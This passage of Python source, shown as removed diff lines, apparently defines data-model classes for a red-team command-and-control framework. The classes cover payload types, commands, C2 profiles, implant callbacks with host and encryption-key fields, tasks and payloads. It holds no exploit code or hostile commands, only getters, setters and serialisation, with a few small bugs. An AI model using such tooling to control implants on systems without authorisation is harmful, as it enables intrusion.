service: str = None, - author: str = None, - note: str = None, - supports_dynamic_loading: bool = None, - deleted: bool = None, - build_parameters: List[Dict] = None, - id: int = None, - c2_profiles: List[Union["C2Profile", Dict]] = None, - commands: List[Union["Command", str, Dict]] = None, - ): - self._ptype = ptype - self._creation_time = creation_time - self._file_extension = file_extension - self._wrapper = wrapper - if isinstance(wrapped, PayloadType) or wrapped is None: - self._wrapped = wrapped - else: - self._wrapped_ = PayloadType(ptype=wrapped) - self._supported_os = supported_os - self._last_heartbeat = last_heartbeat - self._container_running = container_running - self._service = service - self._id = id - self._author = author - self._note = note - self._build_parameters = build_parameters - self._supports_dynamic_loading = supports_dynamic_loading - self._deleted = deleted - if isinstance(c2_profiles, List): - self._c2_profiles = [ - C2Profile(**x) if isinstance(x, Dict) else x for x in c2_profiles - ] - else: - self._c2_profiles = c2_profiles - if isinstance(commands, List): - self._commands = [ - Command(**x) - if isinstance(x, Dict) - else Command(cmd=x) - if isinstance(x, str) - else x - for x in commands - ] - else: - self._commands = commands - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, PayloadType): - return self._ptype == other.ptype or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def ptype(self) -> str: - return self._ptype - - @ptype.setter - def ptype(self, ptype): - self._ptype = ptype - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def file_extension(self) -> str: - return self._file_extension - - @file_extension.setter - def file_extension(self, file_extension): - self._file_extension = file_extension - - @property - def wrapper(self) -> bool: - return self._wrapper - - @wrapper.setter - def wrapper(self, wrapper): - self._wrapper = wrapper - - @property - def wrapped(self) -> "PayloadType": - return self._wrapped - - @wrapped.setter - def wrapped(self, wrapped): - if isinstance(wrapped, PayloadType) or wrapped is None: - self._wrapped = wrapped - else: - self._wrapped_ = PayloadType(ptype=wrapped) - - @property - def supported_os(self) -> str: - return self._supported_os - - @supported_os.setter - def supported_os(self, supported_os): - self._supported_os = supported_os - - @property - def last_heartbeat(self) -> str: - return self._last_heartbeat - - @last_heartbeat.setter - def last_heartbeat(self, last_heartbeat): - self._last_heartbeat = last_heartbeat - - @property - def container_running(self) -> bool: - return self._container_running - - @container_running.setter - def container_running(self, container_running): - self._container_running = container_running - - @property - def service(self) -> str: - return self._service - - @service.setter - def service(self, service): - self._service = service - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def author(self) -> str: - return self._author - - @author.setter - def author(self, author): - self._author = author - - @property - def note(self) -> str: - return self._note - - @note.setter - def note(self, note): - self._note = note - - @property - def supports_dynamic_loading(self) -> bool: - return self._supports_dynamic_loading - - @supports_dynamic_loading.setter - def supports_dynamic_loading(self, supports_dynamic_loading): - self._supports_dynamic_loading = supports_dynamic_loading - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def build_parameters(self) -> List[Dict]: - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - @property - def c2_profiles(self) -> List["C2Profile"]: - return self._c2_profiles - - @c2_profiles.setter - def c2_profiles(self, c2_profiles): - if isinstance(c2_profiles, List): - self._c2_profiles = [ - C2Profile(**x) if isinstance(x, Dict) else x for x in c2_profiles - ] - else: - self._c2_profiles = c2_profiles - - @property - def commands(self) -> List["Command"]: - return self._commands - - @commands.setter - def commands(self, commands): - if isinstance(commands, List): - self._commands = [ - Command(**x) - if isinstance(x, Dict) - else Command(cmd=x) - if isinstance(x, str) - else x - for x in commands - ] - else: - self._commands = commands - - -class Command: - def __init__( - self, - needs_admin: bool = None, - help_cmd: str = None, - description: str = None, - cmd: str = None, - payload_type: Union[PayloadType, str] = None, - creation_time: str = None, - version: int = None, - is_exit: bool = None, - is_file_browse: bool = None, - is_process_list: bool = None, - is_download_file: bool = None, - is_remove_file: bool = None, - is_upload_file: bool = None, - author: str = None, - mythic_version: int = None, - deleted: bool = None, - id: int = None, - params: List[Union["CommandParameters", Dict[str, str]]] = None, - ): - self._needs_admin = needs_admin - self._help_cmd = help_cmd - self._description = description - self._cmd = cmd - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - self._creation_time = creation_time - self._version = version - self._is_exit = is_exit - self._is_file_browse = is_file_browse - self._is_process_list = is_process_list - self._is_download_file = is_download_file - self._is_remove_file = is_remove_file - self._is_upload_file = is_upload_file - self._author = author - self._delted = deleted - self._mythic_version = mythic_version - self._id = id - if params is not None and params != []: - if isinstance(params, list): - self._params = [ - CommandParameters(**x) if isinstance(x, Dict) else x for x in params - ] - else: - raise ValueError("params must be a list") - else: - self._params = None - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Command): - return ( - self._cmd == other.cmd - and self._payload_type.ptype == other.payload_type.ptype - ) or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def needs_admin(self) -> bool: - return self._needs_admin - - @needs_admin.setter - def needs_admin(self, needs_admin): - self._needs_admin = needs_admin - - @property - def help_cmd(self) -> str: - return self._help_cmd - - @help_cmd.setter - def help_cmd(self, help_cmd): - self._help_cmd = help_cmd - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def cmd(self) -> str: - return self._cmd - - @cmd.setter - def cmd(self, cmd): - self._cmd = cmd - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def version(self) -> int: - return self._version - - @version.setter - def version(self, version): - self._version = version - - @property - def is_exit(self) -> bool: - return self._is_exit - - @is_exit.setter - def is_exit(self, is_exit): - self._is_exit = is_exit - - @property - def is_file_browse(self) -> bool: - return self._is_file_browse - - @is_file_browse.setter - def is_file_browse(self, is_file_browse): - self._is_file_browse = is_file_browse - - @property - def is_process_list(self) -> bool: - return self._is_process_list - - @is_process_list.setter - def is_process_list(self, is_process_list): - self._is_process_list = is_process_list - - @property - def is_download_file(self) -> bool: - return self._is_download_file - - @is_download_file.setter - def is_download_file(self, is_download_file): - self._is_download_file = is_download_file - - @property - def is_remove_file(self) -> bool: - return self._is_remove_file - - @is_remove_file.setter - def is_remove_file(self, is_remove_file): - self._is_remove_file = is_remove_file - - @property - def is_upload_file(self) -> bool: - return self._is_upload_file - - @is_upload_file.setter - def is_upload_file(self, is_upload_file): - self._is_upload_file = is_upload_file - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def author(self) -> str: - return self._author - - @author.setter - def author(self, author): - self._author = author - - @property - def mythic_version(self) -> int: - return self._mythic_version - - @mythic_version.setter - def mythic_version(self, mythic_version): - self._mythic_version = mythic_version - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def params(self) -> List["CommandParameters"]: - return self._params - - @params.setter - def params(self, params): - if isinstance(params, list): - self._params = [ - CommandParameters(**x) if isinstance(x, Dict) else x for x in params - ] - elif params is None or params == []: - self._params = None - else: - raise ValueError("params must be a list") - - -class CommandParameters: - def __init__( - self, - command: Union[ - Command, int - ] = None, # database ID for the corresponding command - cmd: str = None, # cmd string the command refers to (like shell) - payload_type: Union[PayloadType, str] = None, - name: str = None, - type: str = None, - default_value: str = None, - description: str = None, - supported_agents: str = None, - choices: Union[List[str], str] = None, - required: bool = None, - id: int = None, - ): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(id=command) - self._cmd = cmd - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - self._name = name - self._type = type - self._description = description - self._supported_agents = supported_agents - self._default_value = default_value - if isinstance(choices, List) or choices is None: - self._choices = choices - else: - self._choices = choices.split("\n") - self._required = required - self._id = id - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, CommandParameters): - return ( - self._name == other.name - and (self._command == other.command) - or (self._cmd == other.cmd) - ) or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def command(self) -> Command: - return self._command - - @command.setter - def command(self, command): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(id=command) - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def type(self) -> str: - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def supported_agents(self) -> str: - return self._supported_agents - - @supported_agents.setter - def supported_agents(self, supported_agents): - self._supported_agents = supported_agents - - @property - def default_value(self) -> str: - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def choices(self) -> List[str]: - return self._choices - - @choices.setter - def choices(self, choices): - if isinstance(choices, List) or choices is None: - self._choices = choices - else: - self._choices = choices.split("\n") - - @property - def required(self) -> bool: - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def cmd(self) -> str: - return self._cmd - - @cmd.setter - def cmd(self, cmd): - self._cmd = cmd - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - -class C2Profile: - def __init__( - self, - name: str = None, - description: str = None, - creation_time: str = None, - running: bool = None, - last_heartbeat: str = None, - container_running: bool = None, - author: str = None, - is_p2p: bool = None, - is_server_routed: bool = None, - mythic_encrypts: bool = None, - deleted: bool = None, - id: int = None, - ptype: List[Union[PayloadType, str]] = None, - parameters: Dict = None, - ): # list of payload types that support this c2 profile - self._name = name - self._description = description - self._creation_time = creation_time - self._running = running - self._last_heartbeat = last_heartbeat - self._container_running = container_running - self._id = id - self._author = author - self._is_p2p = is_p2p - self._is_server_routed = is_server_routed - self._mythic_encrypts = mythic_encrypts - self._deleted = deleted - if ptype is not None: - if isinstance(ptype, list): - self._ptype = [ - PayloadType(ptype=x) if isinstance(x, str) else x for x in ptype - ] - else: - raise ValueError("ptype must be a list") - else: - self._ptype = ptype - self._parameters = parameters - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, C2Profile): - return self._name == other.name or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def running(self) -> bool: - return self._running - - @running.setter - def running(self, running): - self._running = running - - @property - def last_heartbeat(self) -> str: - return self._last_heartbeat - - @last_heartbeat.setter - def last_heartbeat(self, last_heartbeat): - self._last_heartbeat = last_heartbeat - - @property - def container_running(self) -> bool: - return self._container_running - - @container_running.setter - def container_running(self, container_running): - self._container_running = container_running - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def ptype(self) -> List[PayloadType]: - return self._ptype - - @ptype.setter - def ptype(self, ptype): - if isinstance(ptype, list): - self._ptype = [ - PayloadType(ptype=x) if isinstance(x, str) else x for x in ptype - ] - elif ptype is None: - self._ptype = ptype - else: - raise ValueError("ptype must be a list") - - @property - def author(self) -> str: - return self._author - - @author.setter - def author(self, author): - self._author = author - - @property - def is_p2p(self) -> bool: - return self._is_p2p - - @is_p2p.setter - def is_p2p(self, is_p2p): - self._is_p2p = is_p2p - - @property - def is_server_routed(self) -> bool: - return self._iis_server_routed - - @is_server_routed.setter - def is_server_routed(self, is_server_routed): - self._is_server_routed = is_server_routed - - @property - def mythic_encrypts(self) -> bool: - return self._mythic_encrypts - - @mythic_encrypts.setter - def is_server_routed(self, mythic_encrypts): - self._mythic_encrypts = mythic_encrypts - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - @property - def parameters(self) -> Dict: - return self._parameters - - @parameters.setter - def parameters(self, parameters): - self._parameters = parameters - - -class C2ProfileParameters: - """ - This class combines C2ProfileParameters and C2ProfileParametersInstance - """ - - def __init__( - self, - c2_profile: Union[C2Profile, str] = None, - name: str = None, - default_value: any = None, - required: bool = None, - verifier_regex: str = None, - randomize: bool = None, - parameter_type: str = None, - description: str = None, - id: int = None, - value: any = None, - instance_name: str = None, - operation: Union[Operation, str] = None, - callback: Union["Callback", int] = None, - payload: Union["Payload", str] = None, - ): - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - self._name = name - self._default_value = default_value - self._required = required - self._verifier_regex = verifier_regex - self._parameter_type = parameter_type - self._description = description - self._instance_name = instance_name - self._value = value - self._randomize = randomize - self._id = id - if isinstance(payload, Payload) or payload is None: - self._payload = payload - else: - self._payload = Payload(uuid=payload) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(id=callback) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, C2ProfileParameters): - return self._name == other.name and self._c2_profile == other.c2_profile - return False - - @property - def c2_profile(self) -> C2Profile: - return self._c2_profile - - @c2_profile.setter - def c2_profile(self, c2_profile): - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def verifier_regex(self) -> str: - return self._verifier_regex - - @verifier_regex.setter - def verifier_regex(self, verifier_regex): - self._verifier_regex = verifier_regex - - @property - def parameter_type(self) -> str: - return self._parameter_type - - @parameter_type.setter - def parameter_type(self, parameter_type): - self._parameter_type = parameter_type - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def instance_name(self) -> str: - return self._instance_name - - @instance_name.setter - def instance_name(self, instance_name): - self._instance_name = instance_name - - @property - def default_value(self) -> any: - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def required(self) -> bool: - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def randomize(self) -> bool: - return self._randomize - - @randomize.setter - def randomize(self, randomize): - self._randomize = randomize - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def value(self) -> any: - return self._value - - @value.setter - def value(self, value): - self._value = value - - @property - def payload(self) -> "Payload": - return self._payload - - @payload.setter - def payload(self, payload): - if isinstance(payload, Payload) or payload is None: - self._payload = payload - else: - self._payload = Payload(uuid=payload) - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def callback(self) -> "Callback": - return self._callback - - @callback.setter - def callback(self, callback): - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(id=callback) - - -class Callback: - def __init__( - self, - init_callback: str = None, - last_checkin: str = None, - user: str = None, - host: str = None, - pid: int = None, - ip: str = None, - os: str = None, - domain: str = None, - architecture: str = None, - description: str = None, - operator: Union[Operator, str] = None, - active: bool = None, - port: int = None, - socks_task: int = None, - pcallback: Union["Callback", int] = None, - registered_payload: str = None, # corresponding payload's UUID - payload_type: Union[PayloadType, str] = None, # corresponding payload's type - c2_profile: Union[C2Profile, str] = None, # corresponding payload's c2 profile - payload_description: str = None, # corresponding payload's description - integrity_level: int = None, - operation: Union[Operation, str] = None, - encryption_type: str = None, - decryption_key: str = None, - encryption_key: str = None, - locked: bool = None, - locked_operator: str = None, - tasks: List[Union["Task", Dict]] = None, - id: int = None, - agent_callback_id: str = None, - extra_info: str = None, - sleep_info: str = None, - external_ip: str = None, - payload_type_id: int = None, - supported_profiles: List[Union[C2Profile, Dict]] = None, - ): - self._init_callback = init_callback - self._last_checkin = last_checkin - self._user = user - self._host = host - self._pid = pid - self._ip = ip - self._port = port - self._socks_task = socks_task - self._domain = domain - self._description = description - self._agent_callback_id = agent_callback_id - self._external_ip = external_ip - self._payload_type_id = payload_type_id - self._locked_operator = locked_operator - self._os = os - self._architecture = architecture - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self._active = active - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - elif pcallback == "null": - self._pcallback = None - else: - self._pcallback = Callback(id=pcallback) - if registered_payload is None: - self._registered_payload = registered_payload - else: - self._registered_payload = Payload(uuid=registered_payload) - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - self._payload_description = payload_description - self._integrity_level = integrity_level - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - self._encryption_type = encryption_type - self._decryption_key = decryption_key - self._encryption_key = encryption_key - if isinstance(tasks, List): - self._tasks = [Task(**x) if isinstance(x, Dict) else x for x in tasks] - elif tasks is None: - self._tasks = tasks - else: - self._tasks = [Task(**tasks) if isinstance(tasks, Dict) else tasks] - self._id = id - if supported_profiles is None: - self._supported_profiles = supported_profiles - else: - self._supported_profiles = [x if isinstance(x, C2Profile) else C2Profile(**x) for x in supported_profiles] - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Callback): - return self._id == other.id - return False - - @property - def init_callback(self) -> str: - return self._init_callback - - @init_callback.setter - def init_callback(self, init_callback): - self._init_callback = init_callback - - @property - def last_checkin(self) -> str: - return self._last_checkin - - @last_checkin.setter - def last_checkin(self, last_checkin): - self._last_checkin = last_checkin - - @property - def user(self) -> str: - return self._user - - @user.setter - def user(self, user): - self._user = user - - @property - def host(self) -> str: - return self._host - - @host.setter - def host(self, host): - self._host = host - - @property - def pid(self) -> int: - return self._pid - - @pid.setter - def pid(self, pid): - self._pid = pid - - @property - def ip(self) -> str: - return self._ip - - @ip.setter - def ip(self, ip): - self._ip = ip - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def active(self) -> bool: - return self._active - - @active.setter - def active(self, active): - self._active = active - - @property - def pcallback(self) -> "Callback": - return self._pcallback - - @pcallback.setter - def pcallback(self, pcallback): - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - elif pcallback == "null": - self._pcallback = None - else: - self._pcallback = Callback(id=pcallback) - - @property - def registered_payload(self) -> "Payload": - return self._registered_payload - - @registered_payload.setter - def registered_payload(self, registered_payload): - if isinstance(registered_payload, Payload) or registered_payload is None: - self._registered_payload = registered_payload - else: - self._registered_payload = Payload(uuid=registered_payload) - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - @property - def c2_profile(self) -> C2Profile: - return self._c2_profile - - @c2_profile.setter - def c2_profile(self, c2_profile): - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - - @property - def payload_description(self) -> str: - return self._payload_description - - @payload_description.setter - def payload_description(self, payload_description): - self._payload_description = payload_description - - @property - def integrity_level(self) -> int: - return self._integrity_level - - @integrity_level.setter - def integrity_level(self, integrity_level): - self._integrity_level = integrity_level - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def encryption_type(self) -> str: - return self._encryption_type - - @encryption_type.setter - def encryption_type(self, encryption_type): - self._encryption_type = encryption_type - - @property - def decryption_key(self) -> str: - return self._decryption_key - - @decryption_key.setter - def decryption_key(self, decryption_key): - self._decryption_key = decryption_key - - @property - def encryption_key(self) -> str: - return self._encryption_key - - @encryption_key.setter - def encryption_key(self, encryption_key): - self._encryption_key = encryption_key - - @property - def tasks(self) -> List["Task"]: - return self._tasks - - @tasks.setter - def tasks(self, tasks): - if isinstance(tasks, List): - self._tasks = [Task(**x) if isinstance(x, Dict) else x for x in tasks] - elif tasks is None: - self._tasks = tasks - else: - self._tasks = [Task(**tasks) if isinstance(tasks, Dict) else tasks] - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def supported_profiles(self) -> List[C2Profile]: - return self._supported_profiles - - @supported_profiles.setter - def supported_profiles(self, supported_profiles): - if supported_profiles is None: - self._supported_profiles = supported_profiles - else: - self._supported_profiles = [x if isinstance(x, C2Profile) else C2Profile(**x) for x in supported_profiles] - - -class TaskFile: - def __init__(self, content: Union[bytes, str], filename: str, param_name: str): - self._filename = filename - if isinstance(content, bytes): - self._content = content - else: - self._content = base64.b64decode(content) - self._param_name = param_name - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def param_name(self): - return self._param_name - - @param_name.setter - def param_name(self, param_name): - self._param_name = param_name - - @property - def content(self): - return self._content - - @content.setter - def content(self, content): - if isinstance(content, bytes): - self._content = content - else: - self._content = base64.b64decode(content) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - -class Task: - def __init__( - self, - command: Union[Command, str] = None, - agent_task_id: str = None, - command_id: str = None, - params: str = None, - files: List[TaskFile] = None, - timestamp: str = None, - callback: Union[Callback, int, Dict] = None, - operator: Union[Operator, str] = None, - status: str = None, - task_status: str = None, # sometimes this is set to not conflict with overall status message - original_params: str = None, - comment: str = None, - comment_operator: Union[Operator, str] = None, - completed: bool = None, - id: int = None, - status_timestamp_preprocessing: str = None, - status_timestamp_processed: str = None, - status_timestamp_submitted: str = None, - status_timestamp_processing: str = None, - operation: str = None, - responses: List[Union["Response", Dict]] = None, - ): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(cmd=command) - self.params = params - self.timestamp = timestamp - self.agent_task_id = agent_task_id - self.command_id = command_id - self.status_timestamp_preprocessing = status_timestamp_preprocessing - self.status_timestamp_processed = status_timestamp_processed - self.status_timestamp_submitted = status_timestamp_submitted - self.status_timestamp_processing = status_timestamp_processing - self.operation = operation - self.completed = completed - if isinstance(callback, Callback) or callback is None: - self._callback = callback - elif isinstance(callback, Dict): - self._callback = Callback(**callback) - else: - self._callback = Callback(id=callback) - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self.status = status - self._original_params = original_params - if comment == "": - self._comment = None - else: - self._comment = comment - if isinstance(comment_operator, Operator) or comment_operator is None: - self._comment_operator = comment_operator - elif comment_operator == "null": - self._comment_operator = None - else: - self._comment_operator = Operator(username=comment_operator) - self._id = id - if isinstance(responses, List): - self._responses = [ - Response(**x) if isinstance(x, Dict) else x for x in responses - ] - elif responses is None: - self._responses = responses - else: - self._responses = [ - Response(**responses) - if isinstance(responses, Dict) - else Response(response=responses) - ] - if self._status is None: - self._status = task_status - if isinstance(files, List): - self._files = files - elif isinstance(files, TaskFile): - self._files = [files] - elif files is None: - self._files = None - else: - raise Exception("Invalid value for files parameter") - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Task): - return self._id == other.id - return False - - @property - def command(self) -> Command: - return self._command - - @command.setter - def command(self, command): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(cmd=command) - - @property - def params(self) -> str: - return self._params - - @params.setter - def params(self, params): - if params is None: - self._params = "" - else: - self._params = params - - @property - def files(self) -> List[TaskFile]: - return self._files - - @files.setter - def files(self, files): - if isinstance(files, List): - self._files = files - elif isinstance(files, TaskFile): - self._files = [files] - elif files is None: - self._files = None - else: - raise Exception("Invalid value for files parameter") - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def callback(self) -> Callback: - return self._callback - - @callback.setter - def callback(self, callback): - if isinstance(callback, Callback): - self._callback = callback - else: - self._callback = Callback(id=callback) - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def status(self) -> str: - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def original_params(self) -> str: - return self._original_params - - @original_params.setter - def original_params(self, original_params): - self._original_params = original_params - - @property - def comment(self) -> str: - return self._comment - - @comment.setter - def comment(self, comment): - if comment == "": - self._comment = None - else: - self._comment = comment - - @property - def comment_operator(self) -> Operator: - return self._comment_operator - - @comment_operator.setter - def comment_operator(self, comment_operator): - if isinstance(comment_operator, Operator) or comment_operator is None: - self._comment_operator = comment_operator - elif comment_operator == "null": - self._comment_operator = None - else: - self._comment_operator = Operator(username=comment_operator) - - @property - def responses(self) -> List["Response"]: - return self._responses - - @responses.setter - def responses(self, responses): - if isinstance(responses, List): - self._responses = [ - Response(**x) if isinstance(x, Dict) else x for x in responses - ] - elif responses is None: - self._responses = responses - else: - self._responses = [ - Response(**responses) - if isinstance(responses, Dict) - else Response(response=responses) - ] - - @property - def id(self): - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def task_status(self) -> str: - return self._status - - @task_status.setter - def task_status(self, task_status): - self._status = task_status - - @property - def completed(self) -> bool: - return self._completed - - @completed.setter - def completed(self, completed): - self._completed = completed - - -class Payload: - def __init__( - self, - uuid: str = None, - tag: str = None, - operator: Union[Operator, str] = None, - creation_time: str = None, - payload_type: Union[PayloadType, str] = None, - pcallback: Union["Callback", int] = None, - c2_profiles: Dict[ - Union[C2Profile, str, Dict], List[Union[C2ProfileParameters, Dict]] - ] = None, - operation: Union[Operation, str] = None, - wrapped_payload: Union["Payload", str] = None, - deleted: bool = None, - build_container: str = None, - build_phase: str = None, - build_message: str = None, - callback_alert: bool = None, - auto_generated: bool = None, - task: Union[Task, Dict] = None, - file_id: Union["FileMeta", Dict] = None, - id: int = None, - build_parameters: List[Dict] = None, - commands: List = None, - filename: str = None, - ): - self._uuid = uuid - self._tag = tag - self._build_container = build_container - self._callback_alert = callback_alert - self._auto_generated = auto_generated - self._build_parameters = build_parameters - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self._creation_time = creation_time - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - else: - self._pcallback = Callback(id=pcallback) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(**task) - if isinstance(file_id, FileMeta) or file_id is None: - self._file_id = file_id - else: - self._file_id = FileMeta(**file_id) - if isinstance(wrapped_payload, Payload) or wrapped_payload is None: - self._wrapped_payload = wrapped_payload - else: - self._wrapped_payload = Payload(uuid=wrapped_payload) - self._deleted = deleted - self._build_phase = 